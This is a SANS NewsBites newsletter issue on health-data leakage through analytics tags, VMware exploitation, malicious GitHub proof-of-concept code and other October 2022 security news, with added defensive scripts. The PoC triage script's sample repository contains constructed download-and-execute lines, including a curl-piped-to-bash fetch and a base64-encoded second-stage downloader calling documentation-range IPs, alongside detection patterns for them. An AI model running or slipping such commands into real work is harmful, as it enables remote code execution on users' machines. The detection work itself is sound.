SANS NewsBites

Educate Web Admins on Data Leakage Risk of Analytics Tools; Patch VMware Now to Stop Active Exploits; Beware of Malicious Proof-of-Concept Code on GitHub and Other Repositories

October 25, 2022  |  Volume XXIV - Issue #83

Top of the News


2022-10-24

Analytics Code May Have Leaked Personal Health Data

The Advocate Aurora Health (AAH) network, which operates in Wisconsin and Illinois, has reported a data breach to the US Department of Health and Human Services (HHS) Office for Civil Rights. AAH says that the analytics code it was using on its online portals may have leaked patient data to third parties, including Meta and Google. The incident affects three million individuals.

Editor's Note

There has been a lot of movement in recent years by software architects to include privacy as part of their DevOps requirements, but they don’t always understand the complexity of how much data is being leaked, or where it is being leaked to, in the tools that are used to maintain those web sites once they go into production. This piece is a good one to use to show the CIO and get security expertise integrated into that aspect of DevOps.

John Pescatore

The organization was using tracking services from Google, Facebook and others. Depending on how a user’s browser was configured and whether it was logged into the third-party services, the obtained data may have included first and last names, dates, times and types of scheduled appointments or procedures, and insurance information. This underscores the importance of knowing what data is shared when you're deploying tracking or other analytics-supporting code on customer-facing web sites. Keep in mind the data collected could fall into PII or PHI, which can get you crossways with regulators and regulations (GDPR, CCPA, HIPAA, etc.). At a minimum, exclude them from pages where sensitive information is collected or displayed.

Lee Neely
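
As an added illustration of that last point (example code written for this issue, not anything AAH or the analytics vendors ship), the script below does a static pass over page markup and flags any page that both loads a known tracker tag and collects or displays sensitive-looking fields. The tracker hostnames, the field-name patterns and the two sample pages are constructed assumptions to be extended for your own sites.

```python
"""Static check: does a page load third-party trackers while collecting or showing sensitive data?
Run it over exported page templates before they ship. The tracker and field lists are constructed
heuristics to extend, not a complete catalogue."""
import re
from html.parser import HTMLParser

# Hostnames of common analytics/advertising tags (constructed starter list)
TRACKER_HOSTS = (
    "connect.facebook.net",      # Meta Pixel loader
    "www.facebook.com/tr",       # Meta Pixel image fallback
    "www.googletagmanager.com",
    "www.google-analytics.com",
    "analytics.google.com",
)
# Inline tag API calls that fire even when the loader <script src> sits elsewhere
INLINE_TAG_RE = re.compile(r"\b(fbq|gtag)\s*\(")
# Form field names/ids that suggest PHI or PII (constructed heuristic)
SENSITIVE_FIELD_RE = re.compile(
    r"(ssn|social|dob|birth|diagnos|procedure|appointment|insurance|member[_-]?id|mrn|medication|patient)",
    re.I,
)


class _PageScanner(HTMLParser):
    """Collect tracker loads and sensitive-looking form fields from one page."""

    def __init__(self):
        super().__init__()
        self.trackers = set()
        self.sensitive_fields = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("script", "img", "iframe"):
            src = a.get("src", "")
            for host in TRACKER_HOSTS:
                if host in src:
                    self.trackers.add(host)
        if tag in ("input", "select", "textarea"):
            for key in ("name", "id", "autocomplete"):
                if SENSITIVE_FIELD_RE.search(a.get(key, "")):
                    self.sensitive_fields.add(a[key])
                    break


def audit_page(html: str) -> dict:
    """Return trackers, sensitive fields, and whether both occur on the same page."""
    scanner = _PageScanner()
    scanner.feed(html)
    trackers = set(scanner.trackers)
    trackers.update(f"inline:{fn}" for fn in INLINE_TAG_RE.findall(html))
    return {
        "trackers": sorted(trackers),
        "sensitive_fields": sorted(scanner.sensitive_fields),
        # the page-level gate: a tracker plus sensitive fields means data can leave with the tag
        "leak_risk": bool(trackers) and bool(scanner.sensitive_fields),
    }


# Constructed sample pages (not AAH's actual markup; the pixel id is a placeholder)
SCHEDULING_PAGE = """<html><head><title>Schedule an appointment</title>
<script src="https://connect.facebook.net/en_US/fbevents.js"></script>
<script>fbq('init', 'PIXEL_ID'); fbq('track', 'PageView');</script>
</head><body>
<form action="/schedule" method="post">
  <input name="patient_name">
  <input name="date_of_birth">
  <select name="procedure_type"><option>MRI</option></select>
  <input name="insurance_member_id">
  <button>Book</button>
</form></body></html>"""

MARKETING_PAGE = """<html><head><title>About us</title>
<script src="https://www.googletagmanager.com/gtag/js?id=G-XXXX"></script>
</head><body><p>Welcome.</p><form><input name="newsletter_email"></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("scheduling", SCHEDULING_PAGE), ("marketing", MARKETING_PAGE)):
        print(name, audit_page(page))
```

The flag is only a static gate: wherever it is true, strip the tags from that template or load them behind a route allow-list, then confirm at runtime by watching the browser's network panel for requests to those hosts while walking through a scheduling flow, since what the tag actually sends (URLs, query strings, button text) is not visible in the markup.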

2022-10-21

VMware Vulnerability is Being Exploited in Malware Campaigns

Researchers from Fortinet have detected malware campaigns that are exploiting a known remote code execution vulnerability in VMware Workspace ONE Access. The flaw, for which VMware issued a patch in April, is being exploited to spread ransomware and install cryptominers. Fortinet researchers noted a sudden spike in attempts to exploit the vulnerability in August.

Editor's Note

Just as many enterprises have been slow to patch routers and switches because of the need to bring the network down to do so, VMware patching is often too slow. In the April patch release VMware said these vulnerabilities enabled remote code injection and attacks had been seen in the wild back in April. Should have been a high priority patch.

John Pescatore

We all hate patching servers because of the mission impact. The good news is that you can typically update VMware Tools without a reboot, and with proper configuration, move services to other servers so you can patch the running hypervisor. That leaves the VMware services themselves, often appliances just humming along. Guess what - you need to fix them too. Make sure that you have a policy which sets limits on applying patches, with supporting scans and consequences. Carefully question excuses that there is no way a particular vulnerable component can be exploited.

Lee Neely

2022-10-23

GitHub Repositories with Phony PoCs and Malware

In a technical paper published earlier this month, researchers from Leiden Institute of Advanced Computer Science present findings from their study of the distribution of malicious proof-of-concept exploits on GitHub. In their paper, the researchers write, “We have proposed an approach to detect if a PoC is malicious … [that] relies on detecting the symptoms we have observed in the collected dataset, for example, calls to malicious IP addresses, encoded malicious code, or included Trojanized binaries. With this approach, we have discovered 4893 malicious repository out of 47313 repositories that have been downloaded and checked (i.e., 10.3% of the studied repositories have symptoms of malicious intent). This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub.”

Editor's Note

Fake exploits have a long history, and more recently, GitHub has become the favorite place to post real as well as fake exploits. Whenever you download an exploit, whether it comes from GitHub or other sources, first try to understand what the code is doing and be suspicious if parts of the code are particularly obfuscated or hard to read. Even once you review the exploit, run it with caution on isolated machines.

Johannes Ullrich

I know you want to download the exploit PoC and try it out in your lab. The message here is that they are often loaded with added malware you’re not expecting. Make sure you fully understand any obfuscated or binary code downloaded before executing it. Leverage OSINT tools like VirusTotal to analyze binaries. Also beware of network connections made / attempted in the lab in case the code is calling for more components or phoning a friend.

Lee Neely
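
To make the symptoms both notes describe concrete, here is an added triage script (written for this issue, not the Leiden authors' detector) that walks a downloaded PoC tree and reports hard-coded routable IPs and URLs, download-and-execute one-liners, encoded PowerShell, base64 blobs (decoded and re-scanned) and bundled PE/ELF binaries. The sample repository it builds in a temp directory is constructed for the demonstration and uses documentation IP ranges; treat every hit as a reason to read the file, not as a verdict.

```python
"""Triage a downloaded PoC repository for the symptoms named in the Leiden study:
hard-coded call-outs to IPs/URLs, encoded payloads, and bundled binaries.
Heuristic only: a hit means 'read this before you run it', not 'malicious'."""
import base64
import os
import re
import tempfile

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?[^\s'\"<>]*")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(curl|wget|certutil|Invoke-WebRequest|iwr)\b.{0,120}?(\|\s*(ba)?sh\b|\s-o\s|\biex\b|Start-Process)",
    re.I)
ENCODED_PS_RE = re.compile(r"powershell(\.exe)?\b[^\n]*\s-(e|ec|enc|encodedcommand)\s", re.I)
# Private/loopback/link-local ranges are skipped; documentation ranges such as 203.0.113.0/24
# are deliberately left in so the constructed sample below trips the check.
NON_ROUTABLE_RE = re.compile(r"^(10\.|127\.|0\.|169\.254\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")
BINARY_MAGIC = {b"MZ": "PE executable", b"\x7fELF": "ELF executable"}


def scan_bytes(name: str, data: bytes, depth: int = 0) -> list:
    """Return human-readable findings for one file (or one decoded blob inside it)."""
    for magic, kind in BINARY_MAGIC.items():
        if data.startswith(magic):
            return [f"{name}: bundled {kind}"]          # don't regex a binary
    findings = []
    text = data.decode("utf-8", errors="ignore")
    for ip in sorted(set(IPV4_RE.findall(text))):
        if not NON_ROUTABLE_RE.match(ip):
            findings.append(f"{name}: hard-coded routable IP {ip}")
    for url in sorted(set(URL_RE.findall(text))):
        findings.append(f"{name}: hard-coded URL {url}")
    if DOWNLOAD_EXEC_RE.search(text):
        findings.append(f"{name}: download-and-execute pattern")
    if ENCODED_PS_RE.search(text):
        findings.append(f"{name}: encoded PowerShell command")
    if depth < 2:   # look inside base64 blobs a couple of levels, not forever
        for blob in B64_BLOB_RE.findall(text):
            if re.fullmatch(r"[0-9a-fA-F]+", blob):      # long hex (hashes) is not base64
                continue
            try:
                decoded = base64.b64decode(blob + "=" * (-len(blob) % 4))
            except ValueError:
                continue
            findings.append(f"{name}: base64 blob ({len(blob)} chars)")
            findings.extend(scan_bytes(f"{name}[b64]", decoded, depth + 1))
    return findings


def scan_tree(root: str) -> dict:
    """Map relative path -> findings for every file in the tree that has at least one."""
    report = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                hits = scan_bytes(rel, fh.read())
            if hits:
                report[rel] = hits
    return report


def build_sample_repo() -> str:
    """Write a constructed PoC tree (not a real repository) to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="poc-triage-")
    os.makedirs(os.path.join(root, "tools"))
    stage2 = b"curl -fsSL http://198.51.100.7/stage2.sh -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
    files = {
        # plausible exploit wrapper: takes its target from argv, no call-outs
        "exploit.py": b'import sys, requests\nhost = sys.argv[1]\n'
                      b'r = requests.get(f"https://{host}/api/health", timeout=5)\nprint(r.status_code)\n',
        # 'dependency installer' that fetches and pipes a script from a hard-coded host
        "setup.sh": b"#!/bin/sh\ncurl -s http://203.0.113.10/deps.sh | bash\n",
        # 'config blob' in the README that is really a second-stage downloader
        "README.md": b"## Usage\nPaste this config before running:\n\n" + base64.b64encode(stage2) + b"\n",
        # bundled 'helper' that is a Windows executable
        "tools/helper.exe": b"MZ\x90\x00" + bytes(60),
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, hits in sorted(scan_tree(build_sample_repo()).items()):
        print(path)
        for h in hits:
            print("   ", h)
```

Run this before the PoC ever touches a lab box, then still execute it on an isolated machine with egress blocked or captured; the script cannot see a payload fetched at runtime, only the call-out that fetches it.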

The Rest of the Week's News


2022-10-21

CISA’s Critical Infrastructure Cybersecurity Sector Focus for 2023: Water, Hospitals, K-12

Speaking to an audience at the Mandiant mWISE cybersecurity conference last week, Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly said that her agency will concentrate on the water, health, and education sectors over the next year, three areas of focus that are identified as being “target-rich, resource-poor entities.” In 2020, CISA identified 16 critical infrastructure sectors that need cybersecurity attention. The education sector is not included in that list, but it is a broad target and often hit with ransomware attacks. Easterly also said that CISA plans to publish cross-sector cybersecurity performance goals, developed with the National Institute of Standards and Technology (NIST), next week.

Editor's Note

This continues the focus on critical infrastructure, as promised. This also focuses on the model that these critical sector components are tight on resources and funding, which hopefully will either result in low-cost guidance and/or funded services to help raise the bar without creating a regulatory impossible dream. If nothing else, guidance can be leveraged to help self-assessments toward a risk-based approach to making (affordable) improvements.

Lee Neely

2022-10-24

CISA Releases Microsoft 365 Security Configurations Baseline Recommendations

The US Cybersecurity and Infrastructure Security Agency (CISA) has released security configuration baseline recommendations for Microsoft 365 cloud services. The recommendations are part of CISA’s Secure Cloud Business Application (SCuBA) project, which was launched in April of this year. CISA is accepting public comment on the recommendations through November 24.

Editor's Note

The Center for Internet Security has published widely used consensus configuration benchmarks for Office 365 and many other cloud services. Full list at https://learn.cisecurity.org/benchmarks

John Pescatore

The SCuBA project’s initial scope is Microsoft 365 and Google Web Services, plus an automated tool to perform assessments. Over time they expect to grow to other environments. They are basing their reference model on many existing directives, including CISA cloud security guidance (CDM, Zero Trust, Cloud Security TRA), Federal cloud security guidance (FedRAMP, OMB Zero Trust M-22-09, OMB logging M-21-31) and the Federal ICAM architecture, all in all giving an overview of how these fit together to aid not only security but also incident response. Two risks: having visibility into the data needed, such as CDM, and your cloud service providing needed/timely log data to your SIEM. Even so, if you’re in the federal space, review the document and provide feedback to QSMO@CISA.dhs.gov.

Lee Neely

2022-10-24

Trend Micro: Analysis of Security Issues in Computer Numerical Control Machines

Trend Micro researchers have analyzed computer numerical control (CNC) products from several manufacturers for vulnerabilities to various cyberthreats. The machines were found to be vulnerable to attacks that could cause physical damage, denial-of-service attacks, hijacking, and data theft. Trend Micro will present its findings in a paper, The Security Risks Faced by CNC Machines in Industry 4.0, at the Security Week 2022 ICS Security Conference this week.

Editor's Note

CNC machines are driven by computers with full operating systems. They are designed to last a long time, with that same OS. But that doesn’t mean they are secure enough to be on your network, let alone able to reach the Internet. Isolate (segment) and monitor them, apply patches when released. Only apply supported patches to avoid “bricking” a very expensive device. Don’t expect security improvements in a newer model, the OS supplied is selected for its ability to run the CNC machine, not security.

Lee Neely

Purpose-built machines should be easier to secure than more flexible general-purpose machines. Unfortunately, that is not the result we see. This results in part from the fact that these systems are built by those expert in the purpose but naive about security, in part because they incorporate general purpose components.

William Hugh Murray

2022-10-24

UK’s Information Commissioner Fines Firm Over Inadequate Security

The UK Information Commissioner’s Office (ICO) has fined Interserve Group Limited, a facilities management outsourcing and construction firm, £4.4 million ($5 million) for failing to implement adequate security measures prior to a 2020 cybersecurity incident. Intruders gained access to Interserve’s systems and compromised information belonging to 113,000 employees. The ICO says that at the time of the incident, Interserve was running unsupported versions of Windows Server and outdated versions of antivirus software.

Editor's Note

This is the fourth largest fine imposed by ICO. The intent is to induce careful consideration of the cyber security of business partners. When was the last time you assessed the security of services you’re using to share or process information, particularly business sensitive or regulated data? Can they demonstrate they are keeping services updated and current? Do you know how your data is separated from other customers’ data and is that sufficient? Don’t exclude your cloud services or hosted infrastructure. Consider the level of access their staff has to your data, physical and logical.

Lee Neely

2022-10-24

#StopRansomware Alert from CISA, FBI, HHS: Daixin Team

A joint alert from the US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS) warns about the activity of the Daixin cybercrime group, which has been targeting healthcare-related organizations with ransomware. The alert includes indicators of compromise (IoCs) and suggested mitigations.

Editor's Note

Initial access is gained via VPN servers, either by exploiting a weakness or by leveraging captured credentials. Lateral movement then leverages RDP and SSH. A good first step here is to make sure that your VPN requires MFA. While you’re verifying that is the case, make sure that the VPN servers are being patched and updated. Nobody likes an interruption of the VPN, and the breach hurts more. Keep your VPN current, and don’t leave the old, unsupported (exploitable) units around “just in case;” make sure the lifecycle includes sufficient redundancy for fail-over during maintenance windows.

Lee Neely
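
The VPN-then-RDP/SSH chain in the note above lends itself to a simple fan-out detection. The following is an added example for this issue (not from the CISA/FBI/HHS alert): it parses constructed log lines in two shapes, a flattened Windows 4624/LogonType 10 export and sshd “Accepted” syslog lines, and raises an alert when one source address reaches five or more distinct hosts inside thirty minutes. The VPN pool, the thresholds and the log formats are assumptions to map onto your own environment.

```python
"""Detect the lateral-movement stage the advisory describes: one VPN-pool address fanning out
over RDP and SSH to many internal hosts in a short window. The log line shapes are constructed
(a flattened Windows 4624/LogonType 10 export and sshd syslog); adjust the regexes to your SIEM."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress
import re

VPN_POOL = ipaddress.ip_network("10.200.0.0/16")   # assumed VPN client address pool
FANOUT_THRESHOLD = 5                                 # distinct hosts reached from one source
WINDOW = timedelta(minutes=30)

WIN_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) EventID=4624 LogonType=10 "
    r"IpAddress=(?P<src>\S+) TargetUserName=(?P<user>\S+)")
SSH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port")


def parse(line: str, year: int = 2022):
    """Normalise one line to (timestamp, src_ip, dst_host, protocol, user) or None."""
    m = WIN_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        return ts, m["src"], m["host"], "rdp", m["user"]
    m = SSH_RE.match(line)
    if m:   # syslog carries no year; the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        return ts, m["src"], m["host"], "ssh", m["user"]
    return None


def detect_fanout(lines, year: int = 2022) -> list:
    """One alert per source address that reaches FANOUT_THRESHOLD distinct hosts inside WINDOW."""
    by_src = defaultdict(list)
    for ev in sorted(filter(None, (parse(line, year) for line in lines))):
        by_src[ev[1]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        for i, (ts, _src, _dst, _proto, _user) in enumerate(evs):
            # events from this source inside the trailing window that ends at ts
            window = [e for e in evs[: i + 1] if ts - e[0] <= WINDOW]
            hosts = {e[2] for e in window}
            if len(hosts) >= FANOUT_THRESHOLD:
                alerts.append({
                    "src": src,
                    "from_vpn_pool": ipaddress.ip_address(src) in VPN_POOL,
                    "hosts": sorted(hosts),
                    "protocols": sorted({e[3] for e in window}),
                    "users": sorted({e[4] for e in window}),
                    "first": window[0][0].isoformat(),
                    "last": ts.isoformat(),
                })
                break   # one alert per source is enough for triage
    return alerts


# Constructed sample: one VPN client touching five hosts over RDP and SSH in 20 minutes,
# an admin touching two, and an internal helpdesk address touching one.
# Both log sources are assumed to record UTC for the demo.
SAMPLE_LOG = """\
2022-10-20T02:14:03Z host=FS01 EventID=4624 LogonType=10 IpAddress=10.200.4.17 TargetUserName=svc_backup
2022-10-20T02:15:00Z host=WS17 EventID=4624 LogonType=10 IpAddress=10.200.9.3 TargetUserName=jsmith
Oct 20 02:17:41 db02 sshd[2231]: Accepted password for root from 10.200.4.17 port 51020 ssh2
2022-10-20T02:21:09Z host=DC01 EventID=4624 LogonType=10 IpAddress=10.200.4.17 TargetUserName=svc_backup
Oct 20 02:25:55 web01 sshd[4402]: Accepted password for ubuntu from 10.200.4.17 port 51044 ssh2
2022-10-20T02:33:20Z host=APP03 EventID=4624 LogonType=10 IpAddress=10.200.4.17 TargetUserName=svc_backup
2022-10-20T02:40:00Z host=FS01 EventID=4624 LogonType=10 IpAddress=10.1.5.5 TargetUserName=helpdesk
Oct 20 03:02:11 jump01 sshd[910]: Accepted publickey for jsmith from 10.200.9.3 port 40022 ssh2
"""

if __name__ == "__main__":
    for alert in detect_fanout(SAMPLE_LOG.splitlines()):
        print(alert)
```

Tune the threshold against a week of your own VPN traffic before alerting on it: jump hosts and scanners will fan out legitimately and belong on an allow-list, while a service account or a root password login arriving from the VPN pool is the part of the alert worth reading first.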

2022-10-24

Abode Iota Home Security Vulnerabilities

Abode has made fixes available to address vulnerabilities in its Iota All-In-One Security Kit. Researchers from Cisco’s Talos Intelligence detected the flaws in July; Abode released fixes earlier this fall. One of the flaws, a critical authentication bypass vulnerability in the UDP service communications protocol, could be exploited to turn off security cameras.

Editor's Note

There are a couple of authentication bypass flaws, a memory corruption vulnerability, and a code injection flaw. The good news is that updating to the latest version of the All-in-One Security kit fixes the flaws. Don’t wait on your round-to-it here, the flaw can be leveraged to take over items like your security cameras, which would be “bad.” Make sure that patches for security systems are up there with your patching of boundary protection devices in terms of priority and criticality.

Lee Neely

Internet Storm Center Tech Corner

C2 Communications Through Outlook.com

https://isc.sans.edu/forums/diary/C2+Communications+Through+outlookcom/29180


Apple Patches Everything October 2022 Edition

https://isc.sans.edu/forums/diary/Apple+Patches+Everything+October+2022+Edition/29182


Sczriptzzbn Inject Pushes Malware for NetSupport RAT

https://isc.sans.edu/diary/sczriptzzbn+inject+pushes+malware+for+NetSupport+RAT/29170/


rtfdump find options

https://isc.sans.edu/forums/diary/rtfdumps+Find+Option/29174


F5 Patches

https://support.f5.com/csp/article/K11830089

https://support.f5.com/csp/article/K30425568


Cisco ISE Patch

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-path-trav-Dz5dpzyM


Synology Updates

https://www.synology.com/en-global/security/advisory/Synology_SA_22_17


A study of malicious CVE proof of concept exploits in GitHub

https://arxiv.org/pdf/2210.08374.pdf


Exploited Windows Zero Day Lets JavaScript Files Bypass Security Warnings

https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/


Dormant Colors Live Campaign With Over 1m Data Stealing Extensions Installed

https://guardiosecurity.medium.com/dormant-colors-live-campaign-with-over-1m-data-stealing-extensions-installed-9a9a459b5849